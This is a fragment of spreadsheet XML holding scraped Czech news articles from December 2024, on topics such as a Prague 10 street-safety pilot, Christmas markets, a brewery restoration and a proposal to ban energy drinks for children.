  <si>
    <t>0d7df628bd61fa3153f2</t>
  </si>
  <si>
    <t>Desítka testuje inovativní přístup k bezpečnosti v ulicích</t>
  </si>
  <si>
    <t>Desítka testuje inovativní přístup k bezpečnosti v ulicích Městská část Praha 10 zvyšuje bezpečnost a zkvalitňuje veřejný pořádek v problémových lokalitách prostřednictvím inovativního projektu kombinujícího prevenci, aktivní komunikaci a spolupráci s veřejnými orgány. Po dvou měsících sesbírá zpětnou vazbu a vytvoří novou koncepci prevence kriminality. Radnice Prahy 10 reaguje na dlouhodobé problémy, na které si pravidelně stěžují místní obyvatelé. Řešit je má pilotní bezpečnostní projekt, který bude probíhat do konce letošního prosince na vybraných lokalitách, kde obyvatelé pozorují časté narušování veřejného pořádku, znečišťování prostoru či konzumaci alkoholu na zakázaných místech. S projektem seznamuje tisková zpráva . Mezi problémové lokality patří například stanice metra Strašnická a Skalka, obchodní centrum Eden, kulturní dům Eden, sídliště Vlasta či tramvajová točna v Radošovické. Pracovníci pro bezpečnost a veřejný pořádek tato místa v rámci dvouměsíčního pilotního programu, od začátku listopadu do konce prosince, monitorují a ve spolupráci s policií řeší drobné přestupky či poskytují podporu občanům. „Díky přítomnosti našich pracovníků přímo v ulicích chceme vytvořit prostředí, kde se budou lidé cítit bezpečněji. Tento projekt staví na osobním přístupu a spolupráci s občany, což by mělo přispět k vyšší efektivitě při řešení každodenních problémů,“ uvedl ve zprávě místostarosta Prahy 10 Radek Lojda (TOP 09). Že je kontrola těchto lokalit na místě, se naše redakce v minulosti na vlastní kůži přesvědčila několikrát. Letos v lednu jsme například přinesli reportáž přímo z okolí Skalky. Jak nám tehdy potvrdila tisková mluvčí městské policie v Praze (MPP) Irena Seifertová, situace je krizová a problémy v okolí stanice metra se aktivně zabývá jak městská, tak i státní policie. „Řešili zde převážně veřejný pořádek, a to především ve spojitosti s pitím alkoholu , přestože to zde obecně závazná vyhláška města zakazuje. Většinu přestupků strážníci oznamovali správnímu orgánu, dále nepřizpůsobivým a podnapilým osobám na místě odebírali alkoholické nápoje. Toto opatření výrazně pomohlo ke zlepšení situace na místě samotném, stejně tak v bezprostředním okolí. Výtržnosti pak řešila státní policie,“ sdělila Seifertová naší redakci v lednu letošního roku. Lhůta k předložení nabídek týkajících se prodeje či dlouhodobého nájmu prostor pro nové sídlo radnice Prahy 10 vypršela v pátek 22. listopadu.… V minulosti jsme informovali také o realitě v okolí obchodního centra Eden. Zdejší prodejna Tesco letos v květnu na doporučení městské části i policie upravila otevírací dobu a zrušila 24hodinnový provoz. Důvodem bylo velké množství výjezdů kvůli narušování veřejného pořádku. Závadové osoby se totiž ve velkém shlukovali nejen ve vnitřních prostorách, ale i v okolí venkovní kašny. „Od začátku roku jsme jen ze strany veřejnosti přijali více jak 30 oznámení o problémech u této prodejny. Vedle oznámení strážníci pravidelně kontrolovali danou lokalitu, a to jak v denních, tak hlavně v nočních hodinách,“ řekla nám letos v květnu Seifertová. Mezi nejčastěji řešené problémy podle jejích slov patřilo znečišťování veřejného prostranství, drobné krádeže, ničení majetku či požívání alkoholických nápojů. Nový projekt Desítky má kromě vyšší bezpečnosti přinést také inovativní přístup k řešení krizových situací. Pracovníci v terénu se zaměřují na prevenci konfliktů a narušování pořádku prostřednictvím domluvy a vyjednávání. Tím se snaží snížit napětí v problémových oblastech. V rámci dvouměsíční pilotní fáze bude navíc radnice sbírat zpětnou vazbu od občanů, která se stane základem pro vytvoření nové koncepce prevence kriminality v městské části. „Jde o krok směrem k modernímu a efektivnímu řešení bezpečnostních výzev, který vychází z potřeb našich obyvatel. Cílem je nejen okamžité zlepšení situace v konkrétních lokalitách, ale také vytvoření systému, který bude dlouhodobě udržitelný a prospěšný,“ dodal ve zprávě Lojda. Kombinace prevence, aktivní komunikace a spolupráce s veřejnými orgány má podle Desítky naději na zvýšení kvality života obyvatel a nastavení nového standardu v přístupu k bezpečnosti v městských částech. Autor: A. Houbová Autor person A. Houbová</t>
  </si>
  <si>
    <t>6360</t>
  </si>
  <si>
    <t>20241201_148_3476301967_5ba2eb1eabfa31baefa3.html</t>
  </si>
  <si>
    <t>5ba2eb1eabfa31baefa3</t>
  </si>
  <si>
    <t>Langoš i za 220. Za kolik se na trzích na Staromáku najíte a napijete</t>
  </si>
  <si>
    <t>Langoš i za 220. Za kolik se na trzích na Staromáku najíte a napijete /VIDEO , FOTO/ V sobotu se na Staroměstském náměstí slavnostně rozsvítil vánoční strom a otevřely se tradiční vánoční trhy, které patří k nejoblíbenějším adventním akcím v Praze . Kolik letos stojí svařák, trdelník nebo pivo ? Přinášíme vám kompletní přehled cen.... Celý článek naleznete na: prazsky.denik.cz/... Autor: Pražský deník</t>
  </si>
  <si>
    <t>1350</t>
  </si>
  <si>
    <t>20241201_149_3476301335_2bdb54b3bc913521328c.html</t>
  </si>
  <si>
    <t>2bdb54b3bc913521328c</t>
  </si>
  <si>
    <t>Zastavte se během Brněnských Vánoc v Zážitkové prodejně Kopi Luwak a objevte ty nejlepší dárky pro milovníky kávy a čaje</t>
  </si>
  <si>
    <t>Zastavte se během Brněnských Vánoc v Zážitkové prodejně Kopi Luwak a objevte ty nejlepší dárky pro milovníky kávy a čaje Úvodní stránka Aktuálně Jídlo &amp;amp; pití Inspirace Kdy, kde a co Kam na výlet Rozhovory Sport Search for : Home / Blog / Zastavte se během Brněnských Vánoc v Zážitkové prodejně Kopi Luwak a objevte ty nejlepší dárky pro milovníky kávy a čaje Inspirace 1.12.2024 Zastavte se během Brněnských Vánoc v Zážitkové prodejně Kopi Luwak a objevte ty nejlepší dárky pro milovníky kávy a čaje Adventní Brno má své kouzlo – procházky vánočními trhy, vůně punče a svařeného vína , nasvícená města… A pokud se během své cesty z náměstí Svobody na Moravské náměstí rozhodnete pro chvilku klidu, máme pro vás skvělý tip: navštivte Zážitkovou prodejnu káv a čajů Kopi Luwak na Rašínově ulici. Tato prodejna je ideálním místem, kde se můžete ohřát a dát si výbornou kávu – ať už přímo na místě v příjemném prostředí, nebo s sebou na další adventní putování. A co víc, zatímco si pochutnáte na kávě, zvládnete zde i vybrat vánoční dárky, které potěší každého. U kávy stihnete i nakoupit vánoční dárky Kopi Luwak je doslova rájem pro milovníky kávy a čaje. A v tomto předvánočním čase nabízí širokou nabídku krásně zabalených dárků, které udělají radost komukoli: – Vánoční degustační sety káv – ochutnejte různé druhy, od jemných bezkofeinových po zážitkové speciality. – Dárkové balení kávy s vlastním věnováním – personalizovaný dárek, který zahřeje u srdce i v šálku. – Porcelánové hrnky, siropy, výběrové čaje a vánoční sety – perfektní kombinace elegance a kvality. Zastavit se zde můžete nejen pro dárky, ale i pro chvilku klidu v předvánočním shonu. Pohodlné prostředí a přívětivý personál vám rádi poradí s výběrem a postarají se o to, aby váš zážitek byl dokonalý. Objevte kouzlo nového designu Prodejna prošla nedávno změnou, která ještě více zpříjemňuje nakupování. Nové moderní regály jsou vzdušné, přehledné a nabízejí prostor pro ještě větší sortiment. Ať už hledáte dárek, nebo si chcete udělat radost sami, atmosféra v prodejně vás naladí na tu pravou vánoční pohodu. Káva s příběhem Kopi Luwak nabízí čerstvě praženou kávu z vlastní pražírny Kopi Bean, která zaručuje kvalitu každého zrnka. Pražírna využívá moderní Golden Roaster, což umožňuje precizní pražení výběrových káv z celého světa. Příběh této značky sahá až do roku 2005, kdy její zakladatel Jakub Fiala navštívil první kávovou plantáž v Indonésii . Dnes přináší nejlepší kávové zážitky přímo do Brna , a to nejen v kamenné prodejně, ale i na e-shopu. Nákupy z pohodlí domova Pokud vás předvánoční shon drží doma, můžete veškeré speciality zakoupit také online na jejich e-shopu Kawio.cz. Výběrové kávy, čaje, příslušenství pro baristy a další zboží vám doručí přímo ke dveřím, takže si vánoční nákupy můžete užít v klidu. Praktické informace: Adresa: Rašínova 10, Brno – kousek od náměstí Svobody i Moravského náměstí . Otevírací doba: Po – Pá: 9:00–20:00 So – NE: 10:00– 19:00 Tip: Zastavte se na šálek kávy a odneste si dárek, který potěší každého. Ať už je to výběrová káva, vánoční set, nebo šálek čaje, návštěva Kopi Luwak je zážitkem, který stojí za to. Na fotkách z aktuální fotoreportáže nahlédněte do atmosféry prodejny – nechte se inspirovat k nákupu dárků, které voní po kávě a čaji. Foto: Brno Today Rubrika transition_slide Inspirace</t>
  </si>
  <si>
    <t>313</t>
  </si>
  <si>
    <t>20241201_15_3479309402_2f156abe91f4ac168007.html</t>
  </si>
  <si>
    <t>2f156abe91f4ac168007</t>
  </si>
  <si>
    <t>Záchrana Parostrojního pivovaru Lobeč</t>
  </si>
  <si>
    <t>Záchrana Parostrojního pivovaru Lobeč 1. 12. 2024 7 min čtení Mladí architekti proměnili opuštěnou ruinu na Kokořínsku v obdivovanou stavbu Pivovar v Lobči byl v roce 2007 v havarijním stavu a hrozila jeho demolice. V hodině dvanácté ho před zkázou zachránili mladí architekti, manželé Jana a Pavel Prouzovi. Opuštěnou ruinu proměnili během 17 let ve stavbu, která slouží za příklad dalším konverzím průmyslového dědictví. Za příkladnou obnovu památky získali řadu ocenění, například evropského „památkářského Oscara“ – Cenu Europa Nostra. Architekt Pavel Prouza přibližuje proces objevení památky a její rekonstrukce. Kde se ve vás, mladých architektech, vzala chuť obnovit památku a žít v ní? A proč právě pivovar? Mě fascinovaly památky od dětství. A když jsem šel na architekturu, zajímaly mě právě památky. V naší generaci studentů rezonovalo hlavně průmyslové dědictví, kterým se ty předchozí nezabývaly. Myšlenku, že je potřeba si všímat i industriálních staveb a chránit je, v Čechách odstartovala až ztráta tišnovského nádraží v Praze kvůli magistrále. Více se o průmyslových stavbách začalo mluvit koncem 70. a začátkem 80. let a dospělo se k tomu, že zvlášť pro naši zemi, která byla průmyslovou základnou monarchie, to je klíčové téma a nemůžeme tyto objekty ztrácet tak snadno. A právě v době našich studií na Fakultě architektury ČVUT vzniklo Výzkumné centrum průmyslového dědictví. Pohled do útrob pivovaru S budoucí ženou jste studovali v 90. letech? Ano, na fakultu jsme nastoupili v roce 1996. Učil nás tehdy a mě osobně ovlivnil profesor Tomáš Šenberger , který je s Benjaminem Fragnerem a Evou Dvořákovou nestory oboru průmyslové dědictví v Česku. O letních prázdninách jsem právě pro Evu Dvořákovou, která pracovala v Národním památkovém ústavu, zpracovával průzkum – prvotní mapování industriálních staveb v naší republice. A při jednom z našich výletů jsme objevili pivovar v Lobči . Byl opuštěný a velmi zhuntovaný, nikdo o něj neměl zájem. Byl prodloužený víkend a my si teprve v sobotu ráno řekli, že by bylo fajn odjet z Prahy . Tak jsme píchli prst do mapy a trefili jsme Kokořínsko a našli jsme jednoduché ubytování na zámku v obci Lobeč … Hned na začátku jste s manželkou založili Občanské sdružení pivovar Lobeč. V jakých ohledech spočívají výhody založení neziskovky při obnově památky? Neziskovku jsme založili v roce 2009. Zjistili jsme, že to, co děláme a kam směřujeme, není byznys a celé to musíme pojmout jinak. A také jsme zjistili, že existují možnosti podpory z veřejných zdrojů jen pro neziskovky. Pochopili jsme, že to, co děláme, je kulturní práce a je třeba neziskovku mít. A také, že je nutné udržet kontinuitu, pečlivě jednotlivé fáze obnovy připravovat. Na celou rekonstrukci pivovaru v Lobči jste určitě celých těch 17 let nebyli sami. Počítám, že do celého projektu vstupovalo více lidí. Z počátku to byl i tým naší architektonické kanceláře, naši kolegové, i ti se tam v podstatě měnili. U procesu chvíli byli a pak si šli zase svou cestou. Pomáhali nám i dobrovolníci z platformy Byznys pro společnost. Hodně lidí nám dodávalo pozitivní energii. Co se týká obnovení výroby piva v Lobči , byl pro nás klíčový přínos Tomáše Fencla , jehož snem bylo vařit pivo ve svém vlastním pivovaru. Mysleli jsme si, že s námi v Lobči zůstane napořád, ale po třech letech přišel na to, že je to nad jeho síly, a odešel. Měli jste od začátku představu, kolik to bude stát, kde na to seženete peníze? Neměli. Byla to ta mladická nerozvážnost. Byl to proces, jehož součástí bylo vymyslet financování projektu. Možnosti, které se ukázaly, nakonec formovaly výsledek. Jedna z mých prvních realizací v Praze byla přestavba někdejší továrny na klobouky – Lofty Palmovka. Byla to jedna z prvních konverzí industriální stavby v Česku, kdy se nezbořila továrna a na jejím místě se nepostavila novostavba. Původní továrna zůstala stát a dala identitu celému místu. Mohlo se to tak stát, neboť investorem byl Švýcar, který vnášel do projektu jinou kulturu a uvažování. A to nás ohromně formovalo. Využili jste i již zmiňované možnosti financování projektu z dotačních titulů? Samozřejmě, rozsáhlý památkový projekt bez podpory veřejných zdrojů realizovat nelze. Na počátku to pro nás byla podpora místní akční skupiny Vyhlídka, respektive prostředky přes Státní zemědělský intervenční fond , který myslel také na podporu památek na venkově. Evropské unii ani nešlo tolik o památky a kulturní dědictví, spíše o to, aby venkov lépe prosperoval. Podstatná byla také kontinuální podpora Ministerstva kultury a opakovaně i Středočeského kraje . Když jsme pivovar v roce 2007 pořizovali, trefili jsme se do správné doby, dnes by to muselo být celé jinak. Primárně jsme s dotacemi však nepočítali, protože do té doby tyto možnosti ani nebyly, tehdy ze strany EU teprve začínalo první rozpočtové období. Náš projekt byl jeden z prvních, který se o tuto podporu v regionu ucházel. Byli jsme projekčně připraveni a měli jsme platné stavební povolení. Obnova areálu pak probíhala po etapách kontinuálně řadu let a probíhá vlastně dodnes. Apartmán v pivovaře Jak se na to tenkrát tvářila obec? Obec se úplně netvářila. V roce 1995 bylo centrum Lobče prohlášené za vesnickou památkovou zónu. A motivací k prohlášení byl právě ohrožený pivovar jako dominanta obce. V Lobči totiž nejsou příliš k vidění roubenky typické pro Kokořínsko , ale soubor vrchnostenských staveb: zámek, sýpka, kostel a především pivovar. Obec se snažila, aby pivovar dále nechátral, ale má pouhých 160 obyvatel a s rozsáhlým areálem si sama neporadila. Lobečtí se snažili najít nového majitele, který by byl schopen dát památku dohromady. Ten předchozí, který objekty rozebíral na stavební materiál, totiž zemřel. My jsme dva roky nato pivovar koupili od jeho dcery. Mezitím, než skončilo dědické řízení, ilegálně probíhalo rozebírání pivovaru na stavební materiál. Někdo přistavil náklaďák a vyřezal trámy. Bylo to hodně divoké. Dá se ve stručnosti uvést, co vše na vás čekalo za opravy a rekonstrukce? Samozřejmě se muselo udělat všechno. Základem byla oprava střech, kterým jsme se postupně věnovali celých osm let a teprve potom bylo možné uvažovat o něčem dalším. Vznikl památkový prohlídkový okruh s expozicí, aby byla stavba pro návštěvníky atraktivní. Po 72 letech byla v Lobči obnovena výroba piva , vybudovali jsme restauraci i ubytování pro návštěvníky. Zbyněk Konvička www.propamatky.cz Nejčtenější kategorie Autor: Delta Digital s.r.o.</t>
  </si>
  <si>
    <t>206</t>
  </si>
  <si>
    <t>104</t>
  </si>
  <si>
    <t>20241201_150_3482416014_b184d219b5a50f1643a8.html</t>
  </si>
  <si>
    <t>b184d219b5a50f1643a8</t>
  </si>
  <si>
    <t>Zbývající Věrní i Zrádci u zpovědi: Vylili si srdce před Vojtou Kotkem</t>
  </si>
  <si>
    <t>Zbývající Věrní i Zrádci u zpovědi: Vylili si srdce před Vojtou Kotkem Vítej. Zaklekněte. Honzo, Johne, je něco, z čeho byste se chtěli vyzpovídat? Já bych se vyzpovídal, že jsem někdy byl trošku tvrdý na Johnyho, i když je zrádce, tak jsem to mohl říkat mileji. Máš na mysli to, jak jsi ho označil za Pavla Lišku ? To jsem tím úplně nemyslel, myslel jsem tím právě třeba snídani poté, co byla vyřazená Andy, když jsem nastoupil tak nějak velmi razantně. Byl jsem z toho hodně rozhozený a všichni řekli, zklidnit to, tohle není potřeba tady ty emoce. Ne, to ne. Dobrá , Johny. Já se chci vyzpovídat, že jsem špatně označil Alenku, i když jsem myslel, že by to mohl být i někdo jiný. Slyšel jsem o tobě, že se snažíš do téhle hry propašovat heslo o tobě na Wikipedii . Je to pravda?Co si nejsem jistý, ale mám stránku na Wikipedii. Dobrá. Martine, je něco, z čeho by ses chtěl vyzpovídat? Řekl bych, že ne. Ani z toho, že prý sléváš drinky po ostatních dohromady? Občas nám tady přistane v ledničce víno a je ho docela málo, takže zbytky přeleju do své sklenice a vypiju to.To není zas takový hřích. To nechť posoudí Bůh.Tuňáku, ty jsi vydíral Johnyho u hrobu, že ho nevykopeš, pokud se nepřizná, že je zrádce. To byla moje vyšetřovací metoda, byť lehce z legrace, protože jsem nemyslel, že něco zjistím zásadního, protože zrádce přece neřekne, že je zrádce. Já jsem od něj slyšet, že není zrádce. Sarah, je něco, z čeho by ses chtěla vyzpovídat? Doufám, že jsem v této hře neudělala žádný hřích, ze kterého bych se musela vyzpovídat. Já jsem slyšel, že prý flirtuješ s rytířem křivoklátského stolu Martinem. Paráda. To, že teďka potřebuju ho mít na své straně, aby mě třeba v noci nezabil, tak to je pravda, protože jsem si stoprocentně jistá už teď, že on je zrádce a že je zároveň zrádce s Honzou. Pochybuju, že by to měla být pravda. Nikol, tobě se prý od tvých 17 let líbí Vojta Kotek. Ale nevím, je to vůbec hřích?Jako ještě na mě úplně koukal s takovou smrtí v očích, že ve mně byla taková malá dušička a připadala jsem si zas jak ta patnáctiletá holka. Já to taky nepovažuju za hřích. Dobrá, budiž ti odpuštěno. Detektivní hra Zrádci se blíží k finále. Před jeho branami dostal každý z přeživších hráčů jedinečnou možnost vyzpovídat se. A s těmi, kteří se nejdříve žádný hřích dobrovolně přiznat nechtěli, si poradil Vojta Kotek tentokrát v roli duchovního. Sledujte hru Zrádci v neděli ve 20.15 na Primě nebo na prima+. Pořad: Zrádci</t>
  </si>
  <si>
    <t>20241201_151_3476288877_08ccfb600c03ec1b764a.html</t>
  </si>
  <si>
    <t>08ccfb600c03ec1b764a</t>
  </si>
  <si>
    <t>Vánoční trhy 2024: Vyrazte do větších měst, nebo navštivte menší trhy ve vašem okolí</t>
  </si>
  <si>
    <t>Vánoční trhy 2024: Vyrazte do větších měst, nebo navštivte menší trhy ve vašem okolí Máte rádi vánoční atmosféru a nedovedete si představit svátky bez návštěv typických trhů? Letos se jich v České republice chystá celá řada, rozhodně se tak nemusíte bát, že byste neměli kam vyrazit. Ve kterých městech se budou konat ty nejzajímavější? Někdo chodí na trhy nakupovat dárky, někdo obdivovat vánoční výzdobu, někteří lidé si ale také rádi dají svařák a jen tak čerpají atmosféru svátků. Ať už je u vás důvod jakýkoli, z následující nabídky si rozhodně vyberete. Velké trhy v Praze a Brně Od 30. 11. 2024 můžete navštívit pražské trhy na Staroměstském náměstí , které budou probíhat až do 6. 1. 2025. Ve stejné době proběhnou i trhy na Václavském náměstí . V obou případech si vychutnáte tradiční vánoční atmosféru spojenou s ruchem hlavního města ČR. Velké trhy v Brně můžete navštívit od 30. 11. 2014 až do 23. 11. 2024, píše web Brněnské Vánoce . I tady najdete řadu stánků s vánoční tématikou, české i zahraniční prodejce, ale také vynikající svařák a mnoho stánků s občerstvením. Vánoční jarmark ve Vrchlabí Trhy ve Vrchlabí jsou speciální hlavně tím, že se zde obvykle sjíždí prodejci, kteří nabízí ručně vyráběné vánoční zboží, a to ať už z korálků , skla či dřeva, píše web Kudy z Nudy . Objevíte tu také podomácku vyrobené adventní věnce a něco málo ze sortimentu mimo vánoční tematiky. Navštivte i menší trhy Pokud nemáte možnost podívat se na velké trhy do některého ze zmíněných měst, není třeba se ničeho bát. Poměrně velké trhy se konají také ve městech jako Jihlava , Jablonec nad Nisou nebo Andělská Hluboká. Kromě toho ale prakticky každé menší město pořádá nějaké ty trhy. Může se sice jednat jen o pár stánků a výzdobu trochu chudší, než nabídnou velká města, pokud si ale chcete koupit punč a načerpat sváteční atmosféru, příležitost k tomu budete mít na mnoha místech ČR. Zdroj: Kudy z Nudy , Pražské Trhy , Brněnské Vánoce Autor: Šárka Cvrkalová Sdílet článek: Facebook Tradice Vánoce Zajímavosti Autor: Šárka Cvrkalová Autor person Šárka Cvrkalová</t>
  </si>
  <si>
    <t>380000</t>
  </si>
  <si>
    <t>20241201_152_3476686217_4265e8b461cd9b4d98fa.html</t>
  </si>
  <si>
    <t>4265e8b461cd9b4d98fa</t>
  </si>
  <si>
    <t>12palcová děla jako 12stupňové pivo. RU marína spoléhala na Plzeň</t>
  </si>
  <si>
    <t>12palcová děla jako 12stupňové pivo . RU marína spoléhala na Plzeň Publikováno Od Michaela Hradilová Zbrojní výroba má u nás předlouhé tradice. Na jedno z čestných míst patří výroba děl v plzeňské Škodě a mezi její nejpozoruhodnější kusy pak námořní kanóny označované c.k. rakousko-uherským námořnictvem jako 30.5 cm/45 a 30.5 cm/45 K10.Celý článek zde: ZDROJ ZDE …. ✅ REKLAMU ✅ můžete mít zde například formou zpětného odkazu více: Ceny reklamy …. Doporučujeme: Michaela Hradilová 1. 12. 2024 0 Nizozemsko zachovalo na počátku druhé světové války neutralitu, ale nejen jako sousední země nacistického Německa samozřejmě pozorně pozorovalo průběh tažení Polskem . Obranu mělo samo v zoufalém stavu…. Michaela Hradilová 4. 12. 2024 0 Ruská fregata Admirál Makarov se po potopení křižníku Moskva stala vlajkovou lodí Černomořské flotily. Ale i toto plavidlo bylo poškozeno ukrajinskými drony. Nyní se po dlouhodobé nepřítomnosti objevilo v Novorossijsku …. Michaela Hradilová 26. 11. 2024 0 Společnost Vista Outdoor oznámila, že její akcionáři na včerejším (25. listopadu 2024) mimořádném shromáždění odhlasovali prodej společnosti The Kinetic Group společnosti Czechoslovak Group a.s… . Vaše zpětné odkazy Zobrazení počtu sledujících na Facebook stránce Deník Pravda Sdílet obsah je povoleno s uvedením odkazu.Nabízíme reklamní bannery, odkazy, PR a SEO články. Ceník naleznete zde: (klik) Nový.týždeň: All you need is... 5. 12. 2024 Informace pro Vás zabezpečeno od thsecurity.cz. Spravovat Souhlas s cookies Abychom poskytli co nejlepší služby, používáme k ukládání a/nebo přístupu k informacím o zařízení, technologie jako jsou soubory cookies. Funkční Vždy aktivní Technické uložení nebo přístup je nezbytně nutný pro legitimní účel umožnění použití konkrétní služby, kterou si odběratel nebo uživatel výslovně vyžádal, nebo pouze za účelem provedení přenosu sdělení prostřednictvím sítě elektronických komunikací. Předvolby Technické uložení nebo přístup je nezbytný pro legitimní účel ukládání preferencí, které nejsou požadovány odběratelem nebo uživatelem. Statistiky Technické uložení nebo přístup, který se používá výhradně pro statistické účely. Technické uložení nebo přístup, který se používá výhradně pro anonymní statistické účely. Bez předvolání, dobrovolného plnění ze strany vašeho Poskytovatele internetových služeb nebo dalších záznamů od třetí strany nelze informace, uložené nebo získané pouze pro tento účel, obvykle použít k vaší identifikaci. Marketing Technické uložení nebo přístup je nutný k vytvoření uživatelských profilů za účelem zasílání reklamy nebo sledování uživatele na webových stránkách nebo několika webových stránkách pro podobné marketingové účely. Autor: Michaela Hradilová Autor person Michaela Hradilová</t>
  </si>
  <si>
    <t>20241201_153_3483031715_9cea065690e70ee1f7d7.html</t>
  </si>
  <si>
    <t>9cea065690e70ee1f7d7</t>
  </si>
  <si>
    <t>CNN Prima News: Energetické nápoje si dnes kupují i desetileté děti a potom jim hrozí poruchy spánku, varuje poslankyně ODS Renáta Zajíčková</t>
  </si>
  <si>
    <t>CNN Prima News: Energetické nápoje si dnes kupují i desetileté děti a potom jim hrozí poruchy spánku, varuje poslankyně ODS Renáta Zajíčková 1. prosince 2024 (CNN Prima News) Energetické nápoje si dnes kupují i desetileté děti a potom jim hrozí poruchy spánku, varuje poslankyně ODS Renáta Zajíčková. Ta stojí za návrhem na omezení dostupnosti energy drinků dětem mladším 15 let. V rozhovoru pro CNN Prima NEWS popsala vlastní zkušenosti s tím, co energetické nápoje s dětmi dělají Co si slibujete od zákazu energetických nápojů pro děti? Celý život pracuji ve školství a vím, jak energy drinky negativně ovlivňují mladší generaci. Od zákazu si slibuji, že do společnosti vyšleme signál, že energy drinky jsou svinstvo. Obsahují obrovské množství cukru, kofeinu, taurinu. Původně měly sloužit úzké skupině lidí – sportovcům, řidičům kamionů. Dnes si tyto nápoje běžně kupují malé děti už třeba v deseti letech. A rodiče to ani kolikrát nemusí vědět. Zákaz je také nástroj pro školy, které si budou moci dát do svých školních řádů, že třeba na kurzech, kam se s dětmi jezdí, se nebudou smět konzumovat kromě alkoholu ani energetické nápoje. Můžete ze své zkušenosti konkrétně popsat, co energy drinky s dětmi dělají? Způsobují obezitu, kazí se zuby. A samozřejmě nejen to. Večery a noci děti dnes tráví na sociálních sítích, rodiče to netuší. Děti ráno přijdou do školy a usínají nám tam. Když jsme zjišťovali, proč to tak je, tak kvůli tomu, že nespí. Chodí spát třeba ve čtyři hodiny ráno. A protože dítě ve škole usíná, tak si ráno koupí energy drink, aby bylo schopné vůbec fungovat. Když se studentů ptám, jak spí, tak obrovské procento dětí spí méně než šest hodin. Zásadní jsou ty poruchy spánku. Máme obrovský nárůst dětí s úzkostmi, depresemi, sklony k sebepoškozování. Nemůžeme říct, že je to jednoznačně vinou energy drinků nebo sociálních sítí, je to kombinace víc věcí. Nebylo by ale přeci jen lepší jít cestou osvěty než regulací? Mluvit s dětmi o tom, jak je spánek důležitý, proč jsou energy drinky škodlivé. Musí to být kombinace všeho. Nejde spoléhat jen na osvětu. Věřím, že osvěta ve školách je, ale to je jen jedna část. Máte vliv vrstevníků, reklam, rodiny. Je potřeba osvěta a edukace všech, i dospělých. Ale v kombinaci s regulací. Jak se bude zákaz prodeje hlídat třeba v automatech na nápoje, nebo při nákupu v e-shopech s potravinami? Dítě také může říct staršímu kamarádovi, aby mu drink koupil. Tomu bohužel nezabráníte. Nikdy nepokryjete sto procent. Ale i to, že si děti nápoj nebudou moci koupit v obchodě a nebudou ho moct konzumovat na školních akcích a na veřejnosti, pomůže. Doufám, že se časem ukáže, že zákaz a fungoval a že se konzumace sníží. Výrobci tvrdí, že problémem je, že stavíte energetické nápoje do pozice návykové látky, a že škodlivost není vědecky podložená. Jak vnímáte tu kritiku? Jasně, že s tím nesouhlasí. Budou říkat, že dělají osvětu a necílí na děti, ale všichni víme, jak to je. A jestli jsou energetické nápoje návykové? Je v nich kofein. A ten je, stejně jako tein, návyková látka. Pokud ho konzumuje dospělý člověk, tak jeho organismus už má nějakou odolnost. Pokud ho konzumuje 12leté dítě, tak samozřejmě závislost na kofeinu i cukru může vzniknout. Problematické také je, že děti často energy nápoje kombinují s alkoholem nebo kratomem, a to je násobný negativní účinek. Nedopadne to rovnou tak, že vláda bude chtít nějakým způsobem regulaci pro všechny slazené nezdravé nápoje? V koalici se už debatovalo o zavedení spotřební daně na limonády. To prosazoval ministr zdravotnictví Vlastimil Válek (TOP 09). Jako pravicový politik nejsem úplně ztotožněná s tím, že máme řešit vše, co je nezdravé a škodlivé pro společnost. Vnímám svobodu a vlastní zodpovědnost každého jedince. Pokud se zdravý člověk rozhodne, že se bude ládovat cukrem a do toho kouřit, je to jeho osobní rozhodnutí. Ale chtěla bych, aby se podílel na nákladech, které jsou spojeny s důsledky jeho nezdravého životního stylu. To se teď neděje a jako ODS budeme prosazovat, aby nějaká participace lidí třeba i na zdravotním pojištění byla. Jinak to ale vnímám ve vztahu k dětem. Děti jsou zranitelnější skupinou, nemají tolik informací, jsou ve spotřebitelském řetězci slabším článkem. A pro zmiňovanou spotřební daň na slazené nápoje byste byla? V nějaké míře bych si to dokázala představit, způsobů je více – spotřební daň, DPH. Fakt je ten, že obezita mezi malými dětmi obrovsky stoupá. Dnes když se podíváte na třídu na základní škole, tak to není třída štíhlých sportovních dětí. To je třída otylých, nemotorných mladých lidí, kteří se bojí rozeběhnout. Těch důvodů je strašně moc a je to velmi komplikovaná debata. Jezdíme více auty, nechodíme pěšky, stravujeme se nezdravě, málo se pohybujeme, jsme hodně na sociálních sítích. Potom máme úzkosti, rozhodovací paralýzu, řešíme to prášky. Není jedna věc, která to změní. Měli bychom změnit vnímání sama sebe, svojí role ve společnosti. Ale to je nesmírně těžký úkol a žádná vláda nemá nástroje, aby to změnila. Nový šéf Pirátů Zdeněk Hřib nedávno přišel s nápadem, že by se mělo zrušit ministerstvo školství a agendu by přebraly kraje. Co si o tom myslíte? Je to úplný úlet. Buď se pan Hřib chtěl zviditelnit, anebo ukázal naprostou neznalost školského prostředí. Každý rozumný člověk vnímá, že ministerstvo školství je zastřešující organizace vzdělávání. Kdyby platilo, co chce pan Hřib , tak bychom tady měli 14 různých vzdělávacích systémů, které by byly neřízené, nekoordinované, každý kraj by měl jinou strukturu vzdělávání. Je to naprostý nesmysl. Voláte po zásadních reformách českého vzdělávacího systému, označujete ho za zastaralý. Selhala v tom vláda, potažmo ministerstvo školství? Proč za tři roky situaci nezlepšila? Ještě nejsme u konce. Chystají se poměrně zásadní změny ve školském zákoně. Ale je fakt, že změny, které prosazuji já, v něm obsaženy nejsou. Potřebují delší přípravu. Navrhuji zkrácení základní školní docházky na osm let a prodloužení povinné školní docházky o dva roky, ruku v ruce zároveň. K tomu je ale potřeba ještě odborná široká diskuze. Nicméně to, že je systém školství zastaralý, říkají všichni už roky – včetně vás. Proč tedy vláda neudělala víc? Je pravda, že děláme jen kosmetické změny. Školství je postaveno na třech pilířích – lidi, obsah a systém. My měníme podmínky pro učitele, opečováváme lidské zdroje. Měníme i obsah, teď se dělá revize rámcových vzdělávacích programů. Ale 30 let jsme nesáhli na systém. Je potřeba sáhnout do architektury a prodloužit povinnou školní docházku. A proč se za tři roky nic nestalo? Na to je jednoduchá odpověď. Protože se tady často měnili ministři. Během čtyřletého období se ministři střídali jak panáci na orloji. Je to zodpovědnost hnutí STAN, které má v gesci ministerstvo školství? Je. Premiér nebude zasahovat do toho, koho si jednotlivé politické strany nominují. Nejdříve to byl pan Gazdík, pak pan Balaš, pak pan Bek. Nebyla tady kontinuita. To, co dnes říká pan ministr Bek, je někdy i v rozporu s tím, co si představovali pan Gazdík či Balaš. Starostové promrhali potenciál, který jim byl dán. Kdyby tady byl jeden ministr, věřím, že bychom byli dál. (Autor: Barbora Zykmundová) Rozhovor vyšel na CNN Prima News . poslankyně PČR starostka MČ Praha 5 Autor: 